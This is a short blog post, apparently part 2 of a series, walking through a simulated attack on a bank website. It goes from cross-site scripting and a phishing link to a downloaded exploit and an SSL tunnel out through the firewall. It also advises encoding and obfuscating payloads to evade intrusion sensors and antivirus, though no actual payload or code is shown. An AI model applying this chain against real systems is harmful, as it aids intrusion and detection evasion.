So, part 2 is here, i have received several mails to blog on this.
This attack is simulated with a Cross Site Scripting vulnerability, example www.bank.co.ke. So what happens is the attacker discovers a flaw on the website where user inputs are not sanitized. Www.bank.co.ke, sits in the banks Server Farm, inside the DMZ well protected by the Cooperate Firewall. In the Server farm are DB servers, Mails Servers, Domain servers and the Web server etc.
So what happens is the hackers injects code into the website and convinces a techi support user to check the link out. The link has full website address, but the other injection parts are encoded for disguise, and the IDPS (Intrusion Detection Prevension System) sensors does not pick that when going to his email.
The attacker has a remote zombie which has an exe embedded to a js script, so he will send an encode format of an url that sounds like below (this needs to be encoded to bypass Intrusion sensors and filters)
The character // --> is meant to comment out anything that gets generated up to that point. Then we have the next step of the payload where a script is hosted on attacking server which has the exploit ready for the client. Its downloaded and is executed on the Users PC. From there, we have an SSLED tunnel, from inside cooperate LAN to zombie server via a command prompt. So the attacker can control the PC from his laptop via the zombie through a tunnel which is not detected at the FW and IDPS centre.
There is so many other ways to inject malicious code on websites, which can fully trick users to engage with the exploits without their will. These attacks will need to be obfuscated to avoid AVs and Intrusion Sensors
Questions and comments can be done below. If you wish to know how far more the exploitation can go, please comment or mail me, i will be happy to recreate a full post as part 3.